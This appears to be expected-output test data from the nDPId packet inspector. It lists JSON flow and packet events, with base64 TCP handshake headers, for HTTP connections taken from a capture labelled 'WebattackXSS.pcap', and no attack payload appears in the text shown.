-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":2,"flow_last_seen":1499347622524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347622524,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5xwFxGkkBZQnnqAScSA28QAAAgQFtAQCCAoD5TjgATtnawEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":3,"flow_last_seen":1499347622525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347622525,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QPdAAD4GhOGsEAABwKgKMuccAFAFlCeeBcRpJYAQAOXV+AAAAQEICgE7Z2sD5Tjg"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5487,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347623786,"flow_last_seen":1499347623786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347623786,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5487,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":1,"flow_last_seen":1499347623786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347623786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EPlAAD4GtNesEAABwKgKMucqAFD89nheAAAAAKACchCYUQAAAgQFtAQCCAoBO2inAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":2,"flow_last_seen":1499347623786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347623786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5yptg31h\/PZ4X6AScSBwSgAAAgQFtAQCCAoD5TocATtopwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":3,"flow_last_seen":1499347623787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347623787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EPpAAD4GtN6sEAABwKgKMucqAFD89nhfbYN9YoAQAOUPUgAAAQEICgE7aKcD5Toc"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5499,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347625094,"flow_last_seen":1499347625094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347625094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5499,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":1,"flow_last_seen":1499347625094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347625094,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QvlAAD4GgtesEAABwKgKMuc4AFBpNSsUAAAAAKACchB4CQAAAgQFtAQCCAoBO2ntAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5500,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":2,"flow_last_seen":1499347625094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347625094,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5zhhGRuGaTUrFaAScSC9AAAAAgQFtAQCCAoD5TtjATtp7QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5502,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":3,"flow_last_seen":1499347625095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347625095,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QvpAAD4Ggt6sEAABwKgKMuc4AFBpNSsVYRkbh4AQAOVcBwAAAQEICgE7ae4D5Ttj"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347626349,"flow_last_seen":1499347626349,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347626349,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":1,"flow_last_seen":1499347626349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347626349,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CphAAD4GuzisEAABwKgKMudGAFA4VWG\/AAAAAKACchBw9gAAAgQFtAQCCAoBO2snAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":2,"flow_last_seen":1499347626349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347626349,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ50a6Rl2POFVhwKAScSAZfgAAAgQFtAQCCAoD5TycATtrJwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5513,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":3,"flow_last_seen":1499347626351,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347626351,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CplAAD4Guz+sEAABwKgKMudGAFA4VWHAukZdkIAQAOW4hAAAAQEICgE7aygD5Tyc"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347627616,"flow_last_seen":1499347627616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627616,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1499347627616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347627616,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GbxAAD4GrBSsEAABwKgKMudUAFBilXXYAAAAAKACchAxUgAAAgQFtAQCCAoBO2xkAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":2,"flow_last_seen":1499347627616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347627616,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ51QwQXQsYpV12aAScSBMBQAAAgQFtAQCCAoD5T3ZATtsZAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5524,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":3,"flow_last_seen":1499347627617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347627617,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Gb1AAD4GrBusEAABwKgKMudUAFBilXXZMEF0LYAQAOXrDAAAAQEICgE7bGQD5T3Z"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347495714,"flow_last_seen":1499347500750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347495714,"flow_last_seen":1499347500750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347498249,"flow_last_seen":1499347503750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57832,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347498249,"flow_last_seen":1499347503750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347499500,"flow_last_seen":1499347504749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57846,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347499500,"flow_last_seen":1499347504749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347500770,"flow_last_seen":1499347506751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57860,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347500770,"flow_last_seen":1499347506751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347503273,"flow_last_seen":1499347508751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57886,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347503273,"flow_last_seen":1499347508751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347504529,"flow_last_seen":1499347509751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57900,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347504529,"flow_last_seen":1499347509751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347630130,"flow_last_seen":1499347630130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347630130,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1499347630130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347630130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rFRAAD4GGXysEAABwKgKMuduAFDOysKMAAAAAKACchB12gAAAgQFtAQCCAoBO27YAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":2,"flow_last_seen":1499347630130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347630130,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5252igpmzsrCjaAScSCxlQAAAgQFtAQCCAoD5UBOATtu2AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":3,"flow_last_seen":1499347630131,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347630131,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rFVAAD4GGYOsEAABwKgKMuduAFDOysKNdooKZ4AQAOVQnAAAAQEICgE7btkD5UBO"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5555,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347631388,"flow_last_seen":1499347631388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347631388,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5555,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":1,"flow_last_seen":1499347631388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347631388,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+pxAAD4GyzOsEAABwKgKMud8AFDgpIqPAAAAAKACchCatAAAAgQFtAQCCAoBO3ATAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":2,"flow_last_seen":1499347631388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347631388,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ53x5W3jF4KSKkKAScSBkBQAAAgQFtAQCCAoD5UGIATtwEwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5558,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":3,"flow_last_seen":1499347631389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347631389,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+p1AAD4GyzqsEAABwKgKMud8AFDgpIqQeVt4xoAQAOUDDQAAAQEICgE7cBMD5UGI"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347632635,"flow_last_seen":1499347632635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347632635,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":1,"flow_last_seen":1499347632635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347632635,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8d6hAAD4GTiisEAABwKgKMueKAFDGJwbjAAAAAKACchA3mAAAAgQFtAQCCAoBO3FLAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5569,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":2,"flow_last_seen":1499347632635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347632635,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ54oMamRgxicG5KAScSCBBwAAAgQFtAQCCAoD5ULAATtxSwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5570,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":3,"flow_last_seen":1499347632636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347632636,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0d6lAAD4GTi+sEAABwKgKMueKAFDGJwbkDGpkYYAQAOUgDwAAAQEICgE7cUsD5ULA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5587,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347635154,"flow_last_seen":1499347635154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347635154,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5587,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":1,"flow_last_seen":1499347635154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347635154,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84sRAAD4G4wusEAABwKgKMuekAFB1fpEEAAAAAKACchD7kAAAAgQFtAQCCAoBO3PAAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5588,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":2,"flow_last_seen":1499347635154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347635154,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ56RhPiSidX6RBaAScSAtdAAAAgQFtAQCCAoD5UU2ATtzwAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5590,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":3,"flow_last_seen":1499347635156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347635156,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04sVAAD4G4xKsEAABwKgKMuekAFB1fpEFYT4ko4AQAOXMegAAAQEICgE7c8ED5UU2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347636429,"flow_last_seen":1499347636429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347636429,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 